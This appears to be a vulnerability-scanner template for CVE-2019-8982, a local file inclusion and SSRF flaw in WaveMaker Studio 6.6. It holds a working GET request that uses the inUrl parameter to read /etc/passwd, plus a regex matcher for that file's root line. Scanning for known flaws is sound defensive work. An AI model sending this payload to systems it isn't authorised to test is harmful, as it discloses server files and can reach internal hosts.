id: CVE-2019-8982 info: name: Wavemaker Studio 6.6 LFI/SSRF author: madrobot severity: high description: com/wavemaker/studio/StudioService.java in WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value, leading to disclosure of local files and SSRF. reference: https://www.exploit-db.com/exploits/45158 tags: cve,cve2019,wavemaker,lfi,ssrf requests: - method: GET path: - "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd" matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:[x*]:0:0:" part: body